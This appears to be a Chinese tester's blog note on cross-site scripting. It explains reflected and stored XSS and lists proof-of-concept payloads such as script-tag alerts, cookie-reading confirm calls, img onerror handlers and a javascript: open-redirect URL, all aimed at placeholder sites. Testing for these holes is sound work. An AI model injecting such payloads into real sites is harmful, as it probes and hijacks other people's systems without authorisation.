xss跨站脚本测试

时间:2022-03-28 08:51:20

测试的时候会涉及到xss测试,下面简要整理下xss的知识

xss跨站脚本特点就是能注入恶意的HTML/JS代码到用户浏览器,劫持用户会话,如果确认存在漏洞,会随着注入的内容不同而产生危害比如:窃取cookie,网页挂马,恶意操作,跨站蠕虫等等

分类:

反射型:非持久,一般为一个url,需要用户单击,在url中参数传入

持久型:常存在于评论等交互中,常见于<textarea>这种标签,可用于挂马钓鱼渗透等

可见,为了防止xss,字符过滤可以有效的较少被攻击的危害,但是xss攻击不止这么简单,

它还可以绕过服务端的xss过滤!!!待续

ps:常用的xss攻击语句列表

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet 英文

http://drops.wooyun.org/tips/1955 中文

如果可以发现最基础的xss可以执行,那么就可以注入其他有害的操作或者获取信息

例如一些javacript事件:onerror,onfocus,onclick,ontimeout。。。

http://wenku.baidu.com/link?url=q9-QLRlKm788Hdn7F0-Fy2Ujqg8N995-DLk4cS_cXdds1h9lQIvtGf78KbUM55GtKiS6qTwd--Aj6YSsEh2YmiB4VZ611J3pwdj0AeSeApi

--------------------------------------------------------------------------

/***********工作中用到渗透语句:******************/

1. 跨站攻击

输入框测试

<--测试方法-->

(1)<a href="javascript:alert(1)"/>我的评论</a>

(2)cookies
"/><script>confirm(document.cookie)
<script>confirm(document.cookie)</scr

(3)<script>alert(1)</script>

2. URL跳转漏洞

<--测试方法-->
修改参数中的合法URL为非法URL,然后查看是否能正常跳转或者响应包是否包含了任意的构造URL
例子:
(1)http:/xxx.com.cn/post.do?retUrl=javascript:alert(document.cookie)
直接注入到URl里面了
(2)访问http://xxx.com.cn/login.do?retUrl=http://www.baidu.com
登录后即可跳转到www.baidu.com

3. 存储型跨站

<--测试方法-->
会把攻击者的数据存储在服务器端,攻击行为将伴随着攻击数据一直存在
例子:
在页面源代码中修改回复内容添加
<img src=http://xxx.com.cn/tesad.gif onerror=alert(666) />

4.参数跨站

<--测试方法-->

http://xxx.com.cn/usr/user.jsp?param_prov=&gender=&prov=&city=&birthday=%3Cscript%3Ealert%281%29%3C/script%3E